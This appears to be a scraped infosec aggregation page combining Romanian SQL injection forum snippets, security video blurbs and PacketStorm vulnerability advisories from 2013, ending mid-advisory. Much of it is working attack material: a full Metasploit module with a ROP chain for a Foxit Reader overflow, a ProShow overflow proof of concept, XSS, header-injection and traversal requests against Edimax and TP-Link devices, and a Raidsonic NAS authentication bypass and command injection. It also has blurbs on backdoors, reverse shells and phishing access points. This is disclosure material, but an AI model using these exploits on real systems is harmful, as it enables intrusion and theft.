[[SQLI] Join syntax]

Da, e buna metoda cand ai nevoie de a selecta fiecare coloana.

[[hard] SQLi challenge]

Va mai merge site-ul ?

E down.

The connection has timed out

[It Security Compliance Management Can Be Done Right (And Makes Sense When Done Right)]

Description: What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture?
We will then look at the SOMAP.org project which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right.
Adrian Wiesmann held this talk at the DeepSec 2011 conference.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: IT Security Compliance Management can be done right (and makes sense when done right) on Vimeo
Source: It Security Compliance Management Can Be Done Right (And Makes Sense When Done Right)

[Windows Pwn 7 Oem - Owned Every Mobile?]

Description: The talk aims to provide an introduction into the Windows Phone 7 (WP7) security model to allow security professionals and application developers understand the unique platform security features offered. Currently very little public information is available about Windows Phone 7 OS security preventing adequate determination of the risk exposed by WP7 devices.
The ever increasing challenges and stages of exploitation an attacker has to overcome to achieve full compromise will be discussed. The talk will outline the implementation of these security features and will demonstrate weaknesses and vulnerabilities an attacker could use to bypass the multiple levels of platform security.
A number of OEM manufacturer weaknesses, "features?" will be discussed and a demonstration of how these "features" can be abused in conjunction with conventional exploits to achieve full compromise of the phone will be performed. The talk will demonstrate how OEM phone manufacturers can weaken the security posture of an otherwise strong granular security model and also demonstrate how targeted attacks can be made which leverage this OEM "functionality" to compromise sensitive information.
Alex Plaskett held this talk at the DeepSec 2011 security conference.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Windows Pwn 7 OEM - Owned Every Mobile? on Vimeo
Source: Windows Pwn 7 Oem - Owned Every Mobile?

[Volatility Silentbanker Malware Analysis]

Description: In this video I will show you how analysis SilentBanker Malware Memory using Volatility Framework.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Volatility Silentbanker Malware Analysis

[Metasploit - Persistence Backdoor]

Description: In this video I will show you how to create a persistence backdoor using Metasploit meterpreter – this is very old trick but still useful for maintaining access on a system using an AB script.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Metasploit - Persistence Backdoor

[Photodex ProShow Producer 5.0.3297 Memory Corruption]

A memory corruption vulnerability has been identified in Photodex ProShow Producer version 5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system.

Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product:        Photodex ProShow Producer
Vendor URL:     www.photodex.com
Type:           Improper Restriction of Operations within the Bounds
                of a Memory Buffer[CWE-119]
Date found:     2013-02-14
Date published: 2013-02-14
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3297, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A memory corruption vulnerability has been identified in Photodex
ProShow Producer v5.0.3297.

When opening a crafted style file (.pxs), the application loads the
"title" value from the pxs file.

The ColorPickerProc function does not properly validate the length of
the string loaded from the "title" value from the pxs file before using
it in the further application context, which leads to a memory
corruption condition with possible code execution depending on the
version of the operating system.

Vulnerable function definition (all.dnt):
 __stdcall ColorPickerProc(x, x, x, x)

An attacker needs to force the victim to open a crafted .pxs file in
order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in
denial-of-service conditions.


5. PROOF-OF-CONCEPT (Code / Exploit)
------------------------------------
The following generated string has to be inserted into a .pxs file to
trigger the vulnerability on Windows XP SP3.

#!/usr/bin/python
file="poc.txt"

junk1="\x41" * 233
eip="\x42" * 4
junk2="\xCC" * 100

poc=junk1 + eip + junk2

try:
    print ("[*] Creating exploit file...\n");
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print ("[*] File successfully created!");
except:
    print ("[!] Error while creating file!");


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/46


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2013-02-14: Discovery of the vulnerability
2013-02-14: Full Disclosure because the vendor ignored all previous
            reports.


8. REFERENCES
-------------
http://security.inshell.net/advisory/46

Source: PacketStorm

[Edimax EW-7206APg / EW-7209APg Redirection / XSS / Header Injection]

The Edimax EW-7206APg and EW-7209APg suffer from cross site scripting, HTTP header injection, and open redirection vulnerabilities.

Device Name: EW-7206APg / EW-7209APg
Vendor: Edimax

============  Vulnerable Firmware Releases: ============ 

Device: EW-7206APg
 Hardware Version      Rev. A
 Runtime Code Version   v1.32 
 Runtime Code Version   V1.33

Device: EW-7209APg
 Hardware Version      Rev. A
 Runtime Code Version   1.21 
 Runtime Code Version   1.29 

============ Device Description: ============ 

Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b wireless LAN, this wireless LAN access point can let your wireless LAN client stations access both the wired and the wireless network nodes.

EW-7206APg: http://www.edimax.com/en/produce_detail.php?pl1_id=25&pl2_id=134&pl3_id=359&pd_id=18
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1

============ Vulnerability Overview: ============ 

* URL Redirection: 
  Parameter:  submit-url and wlan_url

http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de

http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd

* reflected XSS:
  Parameter:   submit-url and wlan-url

Injecting scripts into the parameter submit-url or wlan-url reveals that this parameter is not properly validated for malicious input.

Example Exploit:
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test><script>alert('XSSed')</script>test

* stored XSS 

  * in System Utility -> Domain Name:
    => parameter: DomainName

Injecting scripts into the parameter DomainName reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName="><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=

  * Stored XSS in wireless settings / basic settings -> ESSID
    -> The injected script code gets executed within the device information

Injecting scripts into the parameter ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

Example Request:
POST /goform/formWlanSetup HTTP/1.1
Host: 192.168.178.175
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.175/wlbasic.asp
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351

apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=50&y=20&wlan-url=%2Fwlbasic.asp

* HTTP Header Injection:

  Parameter: submit-url

Injecting code into the parameter submit-url mode reveals that this parameter is not properly validated for malicious input and so it is possible to manipulate the header information.

http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND

Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan  1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.178.175/e82f5
New Header: PWND
<snip>

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure

===================== Advisory end =====================

Source: PacketStorm

[TP-Link TL-WA701N / TL-WA701ND Directory Traversal / XSS]

The TP-Link TL-WA701N and TL-WA701ND suffer from stored cross site scripting and directory traversal vulnerabilities.

Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============ Vulnerable Firmware Releases: ============

Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND

Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============ Vulnerability Overview: ============

    * Directory Traversal: 

Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==>> no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WA701N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: 

http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

    * Stored XSS: 

Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc)

Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

    * Stored XSS: 

-> System Tools -> SNMP:

Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter: @s3cur1ty_de

The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

============ Time Line: ============

August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

===================== Advisory end =====================

Source: PacketStorm

[Sql Server Hacking]

Description: In this video Jeremy Druin Talking about SQL Server hacking tricks and advanced exploitation techniques.
He will cover topics like.

Database Exploitation/Post Exploitation
Recon: Detecting SQL Server (Passive)
Scanning: Detecting SQL Server (Active)
Browsing SQL Server
SQL Injection etc ..
More Information : - SQL Server Hacking from ISSA Kentuckiana workshop 7 - Jeremy Druin (Hacking Illustrated Series InfoSec Tutorial Videos)

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Sql Server Hacking

[Nullcon Delhi 2012: Forensics Timeline Analysis - By Ashish Kunte]

Description: Forensic Timeline Analysis is to put together actions and events sequentially and chronologically. Construction and presentation of timelines has become critical investigative method to solve complex issues. To a great extent Timeline Analysis is a bit complicated technique to understand, and digital environment has different and unique challenges. Timestamps can be found in various time formats and they are presented or stored with various interpretations. Timeline building techniques are getting evolved and have changed the way an analyst can approach to the cases. With this discussion we will take a deep dive through details about timeline basics through role of timeline analysis in solving cases such as USB Device Activities, Intrusion/Malware analysis and Intellectual property theft artifacts etc. During the session we will discuss about methodologies on how to start building a timeline and the Granular Approach vs Kitchen Sink.
Timeline Analysis includes methods using easily accessible tools and frameworks. Using this technique we gain much more information that cannot be obtained with Traditional techniques such as only MAC (Modified, Access, and Change) times from a file system. To achieve the goal we will take a deep dive into timestamps associated with
· Web Server such as Apache/IIS
· Browser Activity such as IE History/Chrome/Firefox
· Windows Event Timestamps, Generic Linux Logs
· Windows Registry, Prefecth, Recycle bin, Restore Points
· Windows Shortcuts (.lnk)
· USB Device Activity
· PDF, Office Files Metadata Timestamps
· Flash Cookies or Adobe Local Shared Objects
· Live Memory Timestamps
· Antivirus, ISA log, Firewall timestamps
· Squid Proxy
· Network Packet Dumps

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Nullcon Delhi 2012: Forensics Timeline Analysis - By Ashish Kunte

[Mutillidae: Introduction To Installing, Configuring, And Using Burp-Suite Proxy]

Description: In this video Jeremy Druin talking about Burp-suite proxy usage - how to configure and how to launch a basics attacks. Using Burp-Suite Proxy - He will cover most of all good features of Burp-suites like Sequencer, Repeater, Intruder, and Decoder etc. .. For setting up your environment use Mutillidae or DVWA.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Mutillidae: Introduction To Installing, Configuring, And Using Burp-Suite Proxy

[Ultra Light Forum Cross Site Scripting]

Ultra Light Forum suffers from a persistent cross site scripting vulnerability.

# Ultra Light Forum Persistant XSS Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/advisories/?id=86
# Script: http://sourceforge.net/projects/ultralightforum/files/
# Tested: Win 7

Description :
Ultra Light Forum developed in PHP and MySQL as a standalone forum with high speed, high user-friendliness.
User can create, delete topic, can reply to others topic.
The forum also comes with poll, where user can vote. To know more try UL Forum.

Proof of Concept :
Choose profile settings, and put the messages box with
<script>alert(document.cookie)</script>
And update your profile
So if any user can view you profile, the script will be execute

Demo:
http://bastardlabs.info/demo/ultraforum1.png
http://bastardlabs.info/demo/ultraforum2.png

Source: PacketStorm

[Raidsonic IB-NAS5220 / IB-NAS4220-B XSS / Authentication Bypass]

Raidsonic versions IB-NAS5220 and IB-NAS4220-B suffer from authentication bypass and persistent cross site scripting vulnerabilities.

Device Name: IB-NAS5220 / IB-NAS4220-B
Vendor: Raidsonic

============ Vulnerable Firmware Releases: ============

Product Name IB-NAS5220 / IB-NAS4220-B
Tested Firmware IB5220: 2.6.3-20100206S
Tested Firmware IB4220: 2.6.3.IB.1.RS.1

Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

============ Vulnerability Overview: ============

    * Authentication Bypass: 

-> Access the following URL to bypass the login procedure:
http://<IP>/nav.cgi?foldName=adm&localePreference=en

    * Stored XSS: 

System -> Time Settings -> NTP Server -> User Define

Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png

    * Unauthenticated OS Command Injection 

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.

Example Exploit:
POST /cgi/time/timeHandler.cgi HTTP/1.1
Host: 192.168.178.41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.41/cgi/time/time.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-010
Twitter: @s3cur1ty_de

============ Time Line: ============

August 2012 - discovered vulnerability
27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B
28.08.2012 - vendor responded that they will not publish an update
15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220
15.10.2012 - vendor responded that they will not publish an update
12.02.2013 - public release
===================== Advisory end =====================

Source: PacketStorm

[Basics Of Using Sqlmap - Issa Ky Workshop]

Description: In this video Jeremy Druin talking about Basic Usage of SQLmap and this video is part of ISSA KY Workshop.
this video will cover sqlmap usage - Automated Sql-injection auditing, enumerate the database account, databases, schema, tables, columns and password hashes etc .. Must watch if you are interested in sqlmap tool. For setting up your environment use Mutillidae or DVWA.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Basics Of Using Sqlmap - Issa Ky Workshop

[Cve-2012-6066 Freesshd Authentication Bypass Metasploit Demo]

Description: In this video you will learn how to Bypass Freesshd Authentication using Metasploit Framework - for exploiting this vulnerability you need only username - which defaults to root.
Affected Version : - Freesshd version 1.2.6 and prior

More Information : - CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Cve-2012-6066 Freesshd Authentication Bypass Metasploit Demo

[Cve-2012-3569 Vmware Ovf Tools Format String Vulnerability Metasploit Demo]

Description: This video is all about VMWare OVF Tool format String Vulnerability and exploiting that vulnerability
using Metasploit. This Vulnerability Discovered and reported by Jeremy Brown - Microsoft.

Affected Versions are:
VMware OVF Tool 2.1 and previous for Windows
VMware Workstation 8.0.5 and previous for Windows
VMware Player 4.0.4 and previous for Windows

More Information : - CVE-2012-3569 VMWare OVF Tool Vulnerability Metasploit Demo

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Cve-2012-3569 Vmware Ovf Tools Format String Vulnerability Metasploit Demo

[Fake Ap – Compromise Passwords Using Set]

Description: In this demo I will show you how to create a fake ap for stealing passwords and how to use social engineering toolkit for creating a fake webpage for phishing. Here Social-engineering toolkit is a very useful tool for creating a fake page and ones he enter the password it will auto redirect to main page so maybe victim will think that I have entered wrong password.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Fake Ap – Compromise Passwords Using Set.

[Create An Executable Backdoor Using Powershell Script.]

Description: Create an Executable Backdoor using PowerShell Script.
In this video I will show you how to create a backdoor using PowerShell script. Before you start you need PowerGUI Script Editor for converting PowerShell Script into an exe and this exe fully undetectable - of course. Now create your own script for exploitation or use Social-Engineering toolkit for PowerShell script use reverse shell script for this demo.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Create An Executable Backdoor Using Powershell Script.

[Vreti SQLi ? Intai invatati SQL.]

Mersi, aveam nevoie de ceva mai concret.

E timpu' sa ma pun pe invatat.

[Foxit Reader Plugin URL Processing Buffer Overflow]

This Metasploit module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML

  Rank = NormalRanking

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
          the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
          overly long query strings within URLs can cause a stack-based buffer overflow,
          which can be exploited to execute arbitrary code. This exploit has been tested
          on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
          (npFoxitReaderPlugin.dll version 2.2.1.530).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>',       # initial discovery and poc
          'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
          'juan vazquez',                       # metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '89030' ],
          [ 'BID', '57174' ],
          [ 'EDB', '23944' ],
          [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
          [ 'URL', 'http://secunia.com/advisories/51733/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # npFoxitReaderPlugin.dll version 2.2.1.530
          [ 'Automatic', {} ],
          [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
            {
              'Offset'          => 272,
              'Ret'             => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
              'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
              :rop => :win7_rop_chain
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 7 2013",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''

    case nt
      when '5.1'
        os_name = 'Windows XP SP3'
      when '6.0'
        os_name = 'Windows Vista'
      when '6.1'
        os_name = 'Windows 7'
    end

    if os_name == 'Windows 7' and firefox =~ /18/
      return targets[1]
    end

    return nil
  end

  def junk
    return rand_text_alpha(4).unpack("L")[0].to_i
  end

  def nops
    make_nops(4).unpack("N*")
  end

  # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
  def win7_rop_chain

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
        0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
        0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
        0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
        0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
        0x41414141, # Filler (RETN offset compensation)
        0x1000614c, # & push esp # ret  [npFoxitReaderPlugin.dll]
        0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
        0x00001000, # 0x00001000-> edx
        0x1000d9ec, # XOR EDX, EDX # RETN
        0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
        junk,
        0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
        junk,
        junk,
        junk,
        0x41414141, # Filler (RETN offset compensation)
        0x00000040, # 0x00000040-> ecx
        0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
        0x00000001, # 0x00000001-> ebx
        0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
        0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
        0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
        nops,
        0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
      ].flatten.pack("V*")

    return rop_gadgets
  end

  def on_request_uri(cli, request)

    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless self.respond_to?(my_target[:rop])
      print_error("Invalid target specified: no callback function defined")
      send_not_found(cli)
      return
    end

    return if ((p = regenerate_payload(cli)) == nil)

    # we use two responses:
    # one for an HTTP 301 redirect and sending the payload
    # and one for sending the HTTP 200 OK with appropriate Content-Type
    if request.resource =~ /\.pdf$/
      # sending Content-Type
      resp = create_response(200, "OK")
      resp.body = ""
      resp['Content-Type'] = 'application/pdf'
      resp['Content-Length'] = rand_text_numeric(3,"0")
      cli.send_response(resp)
      return
    else
      resp = create_response(301, "Moved Permanently")
      resp.body = ""

      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
      if datastore['SSL']
        schema = "https"
      else
        schema = "http"
      end

      sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
      sploit << [my_target.ret].pack("V") # EIP
      sploit << [my_target['WritableAddress']].pack("V") # Writable Address
      sploit << self.send(my_target[:rop])
      sploit << p.encoded

      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
      cli.send_response(resp)

      # handle the payload
      handler(cli)
    end
  end

end

Source: PacketStorm

[Sonicwall OEM Scrutinizer 9.5.2 Cross Site Scripting]

Sonicwall OEM Scrutinizer version 9.5.2 suffers from multiple persistent script insertion vulnerabilities that can allow for cross site scripting.

Title:
======
Sonicwall OEM Scrutinizer v9.5.2 - Multiple Web Vulnerabilities


Date:
=====
2013-02-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=786


VL-ID:
=====
786


Common Vulnerability Scoring System:
====================================
5.2


Introduction:
=============
Dell™ SonicWALL™ Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool 
